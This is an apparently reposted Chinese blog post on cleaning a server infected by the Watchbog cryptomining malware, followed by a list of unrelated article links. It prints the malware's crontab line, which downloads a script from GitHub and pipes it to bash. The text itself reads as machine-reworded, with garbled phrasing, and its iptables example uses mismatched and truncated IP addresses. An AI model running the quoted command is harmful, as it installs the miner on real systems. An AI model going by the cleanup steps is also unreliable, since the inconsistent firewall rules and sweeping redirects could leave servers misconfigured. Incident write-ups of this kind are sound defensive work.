服务器挖矿是什么意思,服务器被攻击挖矿怎么解决!

最近运气不太好,居然有台服务器被挖矿了,下面记录下问题发生的过程和解决方法,仅供参考。 一、Watchbog挖矿病毒 1、服务器收到cpu报警,cpu被占用达到100%,登录服务器查看,发现cpu被一个watchbog的进程占满了,如下图所示: 2、杀掉会话 发现用kill杀掉后,这个进程还是会隔一会自动起来,很明显被加入了定时任务,检查所示: */9****(curl-fsSLhttps://r…

近期运势不大好,竟然有台服务器被挖矿了,下边统计下问题造成的流程和解决方案,仅作参考。


一、Watchbog挖矿病毒感染

1、服务器接到cpu警报,cpu被占有做到100%,登陆服务器查询,发现cpu被一个watchbog的过程布满了,如下图所示:

服务器被挖矿了?用这个思路可以彻底解决

2、杀死对话

发现用kill杀死后,这一过程依然会隔一会全自动下去,很显著被添加了定时任务,查验所显示:

*/9 * * * * (curl -fsSL https://raw.githubusercontent.com/luckysBoys/lucks/master/555.sh||wget -q -O- https://raw.githubusercontent.com/luckysBoys/lucks/master/555.sh||python -c \'import urllib2 as fbi;print fbi.urlopen(\"ht
tps://github.com/luckysBoys/lucks/blob/master/5.sh\").read()\'||curl -fsSL https://raw.githubusercontent.com/luckysBoys/lucks/master/555.sh||wget -q -O - https://raw.githubusercontent.com/luckysBoys/lucks/master/555.sh||curl -fsSLk https://raw.githubusercontent.com/luckysBoys/lucks/master/555.sh -m 90||wget -q -O - https://raw.githubusercontent.com/luckysBoys/lucks/master/555.sh --no-check-certificate -t 2 -T 60)|bash
服务器被挖矿了?用这个思路可以彻底解决

开启这一URL,发现好像一堆base64的保密,密文详细地址。

3、当消除掉定时任务的信息以后,隔了一会,其又被添加了以上一模一样的具体内容,因此该木马程序并不是一般的木马程序。

4、通过之后的掌握,发现该过程watchbog为被嵌入的挖矿程序流程,该程序会在cron下边载入脚本制作,按时去pastebin.com免费下载木马病毒逐渐挖矿,假如删掉不完全依然会经常性运行这一挖矿程序流程。


二、处理全过程

1、 改动/etc/hosts

仔细观察定时任务具体内容,可以发现好多个故意网站地址,各自如下所示:

1)raw.githubusercontent.com
2)github.com

先将以上这种详细地址跳转到当地

服务器被挖矿了?用这个思路可以彻底解决

2、服务器防火墙操纵进出总流量

将以上被网络攻击带上的网站域名所相匹配的的ip详细地址开展ip限制。

--例如raw.githubusercontent.com相匹配的ip为10.20.208.21
iptables -A INPUT -s 10.20.209.21 -j DROP
iptables -A OUTPUT -s 10.20.209.21 -j DROP
iptables -A OUTPUT -j DROP -d 10.20.209.2
--保存修改具体内容
/sbin/service iptables save

3、清除curl get脚本制作

由于该挖矿程序流程会依靠curl、wget命令去免费下载病毒感染,因此第一时间大家要开展如下所示实际操作:

mv /usr/bin/curl /usr/bin/lruc
mv /usr/bin/wget /usr/bin/tegw

假如确定病毒感染完全被删掉,我们可以不用实际操作。

4、 删除cron里边的有关每日任务

crontab -l 
/etc/cron.d
/etc/cron.deny
/etc/cron.monthly
/etc/cron.daily
/etc/cron.hourly
/etc/crontab
/etc/cron.weekly

以上8个与cron有关的文件名称我们都必须认真仔细一遍,但凡相关不知名的网站域名等数据都需要彻底删除。

1) crontab -l

服务器被挖矿了?用这个思路可以彻底解决

2)/etc/cron.d

该文件目录下新增加了好多个命令:appache、root、system

服务器被挖矿了?用这个思路可以彻底解决

3)/etc/cron.deny

服务器被挖矿了?用这个思路可以彻底解决

并没有发现

4)/etc/cron.monthly

服务器被挖矿了?用这个思路可以彻底解决

5)/etc/cron.daily

服务器被挖矿了?用这个思路可以彻底解决

6)/etc/cron.hourly

服务器被挖矿了?用这个思路可以彻底解决

7)/etc/crontab

在crontab文件中还发现了新的隐匿命令httpntp、ftpdns

服务器被挖矿了?用这个思路可以彻底解决

8)/etc/cron.weekly

服务器被挖矿了?用这个思路可以彻底解决

并没有发现

最终在使用find过虑一遍,保证彻底清理整洁。

5、 删掉故意命令

与此同时大家还发现了故意命令/bin/httpntp、/bin/ftpsdns、/usr/bin/watchbog

服务器被挖矿了?用这个思路可以彻底解决
服务器被挖矿了?用这个思路可以彻底解决

往往见到这种故意命令,是以定时任务日志(/var/log/cron)中发现的。

网络服务器被挖矿了?用这一思路可以彻底消除

6、 删掉tmp文件目录下timesyncc.service文档

文件详细信息如下所示:

服务器被挖矿了?用这个思路可以彻底解决

7、杀掉watchbog进程

ps -ef|grep watchbog|awk \'{print $2}\'|xargs kill -9

汇总

应对挖矿进程我简易汇总了以下几个方面,假如碰到挖矿进程解决顺序如下所示:

1)查询定时任务,寻找挖矿程序流程在实行的具体内容。

2)将恶意网站地址的hosts所有跳转到当地(127.0.0.1)

3)细心查询审批与定时任务相关的资料和文件目录,开展消除

4)删掉恶意的指令与包,重新命名系统软件中被充分利用的指令

5)杀掉相匹配恶意进程(为什么放进最终呢?由于即使最开始杀掉,其依然会由于定时任务这些自动启动)

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

(0)
上一篇 2022年6月2日 上午9:56
下一篇 2022年6月2日 上午9:57

相关推荐

  • 儿童台灯哪个品牌更护眼(选择台灯的技巧及正确使用方法)

    随着假期马上结束了,孩子们上学后每天晚上都需要做作业或者复习功课,此时就需要台灯的帮助,台灯的选择也会影响儿童的视力,为了避免孩子近视问题,作为家长必须谨慎选购台灯,儿童护眼台灯如何选择,有哪些选购技巧,小编带你去了解一下吧。 儿童护眼台灯如何选择 一、看光源 台灯光源有条状的、有点状的、还有圆形和环形的,台灯的光源应该怎么选择?最好的选择是环形到圆形再到条状。因为环形光源的台灯,光源的照射面更加…

    2022年9月5日
    500
  • 微信怎么导出聊天记录,微信文件批量导出教程

    微信出了新功能:聊天记录“不显示”。 渣男们第一时间更新,并隐藏了各种不堪入目的对话框。 有句话说得好,“好男人都是相似的,渣男却各有各的渣”。 今天兔姐就给大家揭露——渣男十大常见骚操作,希望各位姐妹擦亮眼睛! 林子大了,什么渣男都有。 但遇到渣男不可怕,可怕的是不能及时止损,任其继续伤害你。 所以,对待渣男的正确方式就是:果断说拜拜

    2022年7月7日
    490
  • 4款家用灭蚊灯测评(一起来看看哪款灭蚊灯驱蚊效果最好)

    根据小红花测评了解,市面上比较常见的灭蚊灯有紫外线灭蚊灯和仿生灭蚊灯。小红花测评根据它们不同的灭蚊原理,在京东上购买了4盏热门灭蚊灯。 看看它们究竟能不能靠谱灭蚊? 紫外线灭蚊灯 不吸引蚊子 紫外线灭蚊灯,也被厂家称为纯物理灭蚊,它的原理是利用紫外线吸引蚊子飞向灭蚊灯,在蚊子一靠近灭蚊灯的时候就利用风扇的气流将蚊子吸入,达到捕蚊目的。 然而蚊子真的会被紫外灯吸引吗? 早在1997年,佛罗里达大学就…

    2022年9月19日
    770
  • 爆破营销流程,单品爆破的营销案例分享

    产品和服务是炸药,行业痛点是引爆器,利益和兴趣是雷管,一触即发、威力巨大。 商界传媒携手云放茶园,切中企业家内心深处的回归诉求,梳理出F2C+社群的私家定制茶园模式,8个月时间发展500多个茶园主,估值5亿。 商界大讲堂·内容营销特训营渭南站 “教育不能创造什么,但它能启发创造力,以从事于创造工作。”——陶行知 一个星期,销售逆势增长150多万。对于大多数人,或许并不算什么,但对三秦果业张军峰来说…

    2022年6月17日
    850
  • 华为p9参数配置是多少(最全参数配置)

    请关注我们,为您每天更新手机比选、价格、评测信息,谢谢!请点击右上角的关注。 华为P9(64GB) 上市时间:2016年4月6日 屏幕尺寸:5.2英寸 分辨率:1920×1080 屏幕像素密度:424ppi 窄边框:3.08毫米 屏幕占比:72.5% 屏幕技术:负向液晶显示屏,色彩饱和度(NTSC):96% 输入方式:百度输入法华为版,华为SWYPE输入法,AndroidGMS输入法(AOSP) …

    2022年5月6日
    1290
  • vca四叶草项链价格(教你梵克雅宝编号查真伪)

    "梵克雅宝"是一个具有百年历史的珠宝品牌,以其独树一帜的设计理念和其精湛的工艺赢得了世界的赞誉。特别是象征幸运、健康、财富和爱情的四叶草系列,采用了梵克雅宝标志性的四叶草图案设计元素,自面世以来一直深受全球女性顾客喜爱,同时也成为珠宝界最具辨识度的系列之一。 梵克雅宝四叶草红玉髓镶嵌玫瑰金幸运草手链(售价14800元) 一颗小小的红丽髓四叶草,在玫瑰金材质的相衬下,可谓妙笔生花,戴在手上很显皮肤白…

    2022年10月16日
    1010
  • 兰蔻珍爱爱恋香水怎么样(这款香水无论是外观还是味道都非常独特)

    你知道吗,lancomepreciousTresor已经上市近30年了。它在成千上万种香水中脱颖而出,散发着诱人的香味。香甜、新鲜,玫瑰香味的各种元素都在这瓶香水中充分绽放。 每个女人都想陶醉在这种点缀着鸢尾花和绿荷花的芳香之中,丝绒般的清香沁人心脾。每一款香水都像一件艺术品被女人收藏,今天,请大家和我们一起来品味这款别致的宝贝。 这款香水来自女性之手,专为女性打造。索菲娅·格罗斯曼,这个系列的创…

    2022年9月25日
    570
  • 兰蔻菁纯眼霜怎么样(一款真正的眼纹终结者)

    今天跟大家分享一下声名远扬的兰蔻菁纯眼霜,相信现在有在用眼霜的小仙女基本都听说过。 兰蔻菁纯眼霜呢,很贵,不做活动官方价格是20ml就要1080元,一直很想用,但是又舍不得下手,毕竟太贵了。 有一次呢,我在官方旗舰店买兰蔻的大粉水和兰蔻的小黑瓶发光眼霜,正好做活动,买2个正装可以自主挑选三款小样,我就挑了兰蔻菁纯眼霜,当时的小样还是旧版的菁纯眼霜,拿到手我就迫不及待地使用了,感觉超级棒,而且超级耐…

    2022年9月30日
    490
  • gpa总分怎么算,一文让你快速学会计算gpa

    2020银行春招正在进行中,有些银行会要求考生在网申时填写GPA这一项,但是很多同学不知道如何计算,在此小编给大家整理了GPA的概念以及网申GPA的计算方法。(以下算法仅供参考) GPA是什么 GPA平均学分绩点(General Point Average,即GPA)是以学分与绩点作为衡量学生学习的量与质的计算单位,以取得一定的学分和平均学分绩点作为毕业和获得学位的标准,实施多样的教育规格和较灵活…

    2022年10月11日
    430
  • 李宁足球鞋怎么样(李宁足球鞋质量测评)

    时隔十三年后,李宁携手李铁在上周推出了保留经典设计并进行改良的全新铁系列足球鞋。ENJOYZ“新品赏析”也第一时间带各位EZer欣赏了这款国产经典战靴的重生之作。在见过了太多徒有其表的经典复刻战靴后,重新归来的铁系列足球鞋实战表现能否像当年那样给力显然让不少EZer对其充满疑问。为此,小编今天就通过实战来测试全新铁系列足球鞋中的高端产品——铁系列AG袋鼠皮足球鞋,看看延续当年经典设计并加以改进的它…

    2022年10月25日
    370

发表回复

登录后才能评论

联系我们

400-800-8888

在线咨询: QQ交谈

邮件:admin@example.com

工作时间:周一至周五,9:30-18:30,节假日休息

关注微信